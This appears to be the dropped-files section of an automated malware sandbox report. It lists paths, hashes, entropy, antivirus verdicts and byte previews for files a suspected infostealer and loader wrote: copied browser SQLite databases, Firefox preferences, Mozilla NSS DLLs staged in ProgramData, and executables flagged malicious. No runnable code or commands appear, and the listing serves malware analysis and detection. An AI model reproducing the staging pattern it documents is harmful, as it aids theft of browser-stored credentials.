File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHJDAFIEHIEGDHIDGDGHDHJJJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFCBFBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEBKJDAFHJDGDHJKKEGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9881
Entropy (8bit):	5.531883823463598
Encrypted:	false
SSDEEP:	192:qnaRtZYbBp65hj4qyaaX86KakfGNBw8dJSl:de7quOcwm0
MD5:	60CD002137AD36C5EAB9FBDF078BE517
SHA1:	4452AFEA554D814002AC42AB21F8F5507ADCB655
SHA-256:	88340E332CA24076828F42E7472B9A447D97AFC4C51C3D9E2BD45D02091F5832
SHA-512:	93088DB5F42AEC56F24DF53F9E90F913E3845B79BB829719EBDBFF1CE0D13C93E68BB559F5D6EEFBC70805CB91181FB516233396D633D5D857FAD3BE7CA548C1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KKJKEBKFCAAECAAAAAEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ByVoN4bhSU.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QS4CbvR1WQ.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: ByVoN4bhSU.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: p5iu2ILQzE.exe, Detection: malicious, Browse Filename: build.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JMFoyLSCjP.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a8e43ec2b6.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freecam[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13504000
Entropy (8bit):	6.383363396613263
Encrypted:	false
SSDEEP:	98304:n13Yvg6wqZeAyv4LdzsBatXP/5OT8BJ5aXdyOJ33iV0SKvVirjedq:130gPNBaRP/D4NyOJ33A7Kt2Q
MD5:	704D12A2E64A9B3EBE375594A11F3EE6
SHA1:	E6E45CD1926DE46BFA0832DE19DDEB29C8C0F629
SHA-256:	B5975C9EB7E34161AE63EAB8518B130D4FDCC1526CA512D2E5452C6D701FE912
SHA-512:	B72689628014A48976672427D0470D8E024DAC4D3B266BC9398A8DADD72F1B4D4DC1A4429847A45956AE604CF072CF5419CF3036A4E6D5373517DB38A9D3FFB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........`...............ba..................`....@..........................p............@.............................................P........................................................................... o...............................text...E`a......ba................. ..`.rdata....^...a...^..fa.............@..@.data........`...X...D..............@....idata..............................@....reloc..............................@..B.symtab..............`.................B.rsrc...P............b..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2778112
Entropy (8bit):	6.520236083146977
Encrypted:	false
SSDEEP:	49152:xIiFD6xkjl9IJIooXnq/upXE/8TwH+eq:xIAD6Gx9IJiqGR
MD5:	6D60EE79CBE29830A8F4C2F7541D3E6C
SHA1:	47E98D4E24A51A9FF43B306B34B2F943FF2A4C25
SHA-256:	A9CC4F8BC22BF66ECB50DABE3CFA108728C53B8DDA35878ECB98D547454C180A
SHA-512:	3CE4021601EE733110AE1B8C3970EC2355C4B99F004E506C79980A26FFB0D4B20DD10266C306E1033DEEC5278E8A11F7F38651A98529CD85A24A0919E449341C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ....................... +..........`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lnurvrsx. .........:..............@...bknhvqdr. ..........>.............@....taggant.@......"...B.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2095616
Entropy (8bit):	7.956949866153719
Encrypted:	false
SSDEEP:	49152:DTwsevJGmtkr7AjOENmCOsPo08CUG+UbREOj4CXD3g7:DTSJGmLj9NMcz8CrNRbj4Cz3g7
MD5:	0625BFB508155BF72C447F0819C545A5
SHA1:	FB030ECED8EB89CB25DBB78712CF38476BB959A0
SHA-256:	42321395D0E8E8706391651A061C178878218698EBC6C1A6E2AAAA0D38C23B2B
SHA-512:	B19347B046267D036C735BB4C60D66611CAAB634C878F8D6B104738DCD617D22DE377F87CD35A1B2A25BE42E30A8BA25CBEE4B6293D5D048A0291815C7BA7C05
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,......Pq...........@...........................q....... ...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... .P).........................@...kwdkpzgx.P....W..J..................@...juauvnci.....@q.....................@....taggant.0...Pq.."..................@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	7.08810268095283
Encrypted:	false
SSDEEP:	768:p/YX8BsxC/t8vC4ChMpYtVuWNfaOgFsZuH2k7JEYmIZ8TEgJHyN08mhLBpPHhQKA:prR8VJma+EgJSN7+LBMKqv
MD5:	25598B50055676F87A35CB925232E300
SHA1:	98814A20127F872B1C31DBEB4B3C58DA7DDAE53B
SHA-256:	72E75365812AD4148337A7B207A3B6B93DE6A0292E5D8983D92790332236F932
SHA-512:	EDF042E516247B4D9B541CC8D267A4ACF1C75A4C88B44ECFEC5528767E6132880BFF4D3FC6D5713D0DD28C24882B9059EA88B7C139D8DFC8F8437F3834A26DE5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................p1...........@...........................1.......1...@.................................W...k............................P1..............................O1..................................................... . ............................@....rsrc...............................@....idata ............................@...dwzjxvhv..........................@...mmbykldk.....`1......61.............@....taggant.0...p1.."...<1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
